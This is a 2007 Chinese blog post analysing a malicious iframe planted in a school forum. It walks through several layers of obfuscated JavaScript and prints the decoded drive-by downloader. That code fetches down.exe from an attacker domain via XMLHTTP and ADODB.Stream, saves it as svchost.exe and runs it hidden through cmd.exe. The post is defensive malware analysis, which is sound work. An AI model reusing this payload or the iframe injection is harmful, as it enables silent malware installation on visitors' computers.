加载中…
正文 字体大小:

www.getbbs.com下属的某论坛被挂马分析(非完整版本

(2007-04-14 00:22:06)
分类: 电脑病毒和其它等IT文章

(写于2007-4-13,23:50)

话说浏览某学校的车协论坛(归属www.getbbs.com),然后发现MCAFEE报警,日志记录如下:


2007-4-12;23:06:54;C:\TEMP\XP\Internet\Temporary Internet Files\Content.IE5\GTINS1AR\pasp[1].htm;Exploit-ANIfile.c

 

难道被挂马?而且那个挂马网页是利用了早前的那个ANI漏洞?于是分析开始了......

 

先来一个说明:本来还可以写更多的(看到后面就知道了),可是昨天分析该挂马网页一半的那时候已是深夜00:45分(主要是校园网慢,一些HTML、JS等文件很难下载),怕影响到舍友睡觉,因此只好草草分析到某一点,关机睡觉。今天想继续分析的时候发现全部已经无法连接了......所以很多都写不出来,见谅......


 

<iFrAmE src=hxxp://pp.y1599.com/1.html width=0 height=0></IfRaMe>


打开hxxp://pp.y1599.com/1.html,见如下代码:

<script>
t="60,83,99,114,......,47,112,111,112,101,46,106,115,34,62,60,47,83,99,114,105,112,116,62"
t=eval_r("String.fromCharCode("+t+")");
document.write(t);</script>

 

又是String.fromCharCode加密!天啊!我该如何解密。正发愁之际,无意间偶尔搜索到Javascript Shellhttp://www.squarefree.com/bookmarklets/webdevel.html),有救了......

 

使用方法:
先从http://www.squarefree.com/bookmarklets/importall.html右击下载“Internet Explorer”的bookmarklets。然后打开IE--〉文件---〉导入和导出--〉下一步--〉导入收藏夹--〉浏览定位到刚才下载的一个HTML文件--〉选择目标--〉完成--〉当提示成功的时候即可使用。


打开这个恶意网页(以防万一,先断网),然后打开“收藏夹”--〉“Bookmarklets for Internet Explorer”--〉“dev”--〉“generated source”(蓝色方框所示)。打开新窗口,解密成功!(红色方框所示)

www.getbbs.com下属的某论坛被挂马分析(非完整版本

<SCRIPT language=Javascript src="http://pp.900666.com/pop.js"></SCRIPT>
<SCRIPT language=Javascript src="http://pp.900666.com/pope.js"></SCRIPT>



打开其中一个......
具体是哪一个呢?可是今天写该日志时,那两个文件被删掉了,而现在也无法下载了。只好凭记忆补充了。


该JS指向:
http://pp.900666.com/2.htm
还有一个pope[1].html文件。

 

2.htm内容如下:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>
</head><body>
既酝叹娂孪馁爵弩魻娂纳譅殇筋鬻咩镱翦铘哧馉篝褰⒛捎刑临籂铒铄⒕娂纳譅篝褰⒚找酉液狌蜢ě梏麴函甬拱岸抖镯狍甬狍鹂殇奖З⒕娂纳譅篝褰⒚找酉液狌蜢ě梏麴函甬拱岸抖镯狍甬狍鹂殇奖З⒕集纳志集纳志集纳志娂用疑性犾犷珲徵褰赆鲠筱蜷痿狊蜚舰梏麴函甬拱岸抖镯螈炯靡尚跃娂夏倬集仍吞?
</body></html>

 

 

对付这样US-ASCII加密有一个好办法:使用Microsoft Word。用Microsoft Word打开2.htm后双击js图标(蓝色方框所示),在打开的MICROSOFT SCRIPT EDITOR就可以看见结果了......(红色方框所示)
结果是指向http://pp.900666.com/2.js

www.getbbs.com下属的某论坛被挂马分析(非完整版本

只是写该日志时这个东西已经无法下载了......所以内容就不知道了..........


而pope[1].html的内容如下 (省略部分文字):

<script>
eval_r(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('W("\\m\\u\\6\\8\\2\\f\\d\\6\\1\\M\\6\\b\\6\\c\\1\\P\\1\\t\\5\\7\......\\1\\O");',62,67,'145......|70'.split('|'),0,{}))
</script>

自写加密函数?轩辕小聪教的方法......eval改为document.write,用IE打开,解出一层......(省略部分文字)


eval_r("\146\165\156\143\164......\40\175");

\146\165\156\143\164......\40\175是ASCII8进制加密,因此使用8进制解密(全文):
function gn(n) { var number = Math.random()*n; return 'svchost'+'.exe'; } try { dl='http://pp.900666.com/down.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }

 

利用哪个漏洞就不知道了(XML漏洞?真的不知道,毕竟我还没有去仔细了解),但是有什么作用就不用我说了......

 

=============================
最后总结成一个流程图......唉,如果可以深究下去估计会很精彩........这么多个加密、这么多层转折......可是现在已经全部无法下载了,而且还没有找到pasp.htm的出处呢!唉,实在是遗憾啊!!!

 

www.getbbs.com下属的某论坛被挂马分析(非完整版本

 

0

阅读 评论 收藏 转载 喜欢 打印举报
  • 评论加载中,请稍候...
发评论

    发评论

    以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

      

    新浪BLOG意见反馈留言板 电话:4006900000 提示音后按1键(按当地市话标准计费) 欢迎批评指正

    新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

    新浪公司 版权所有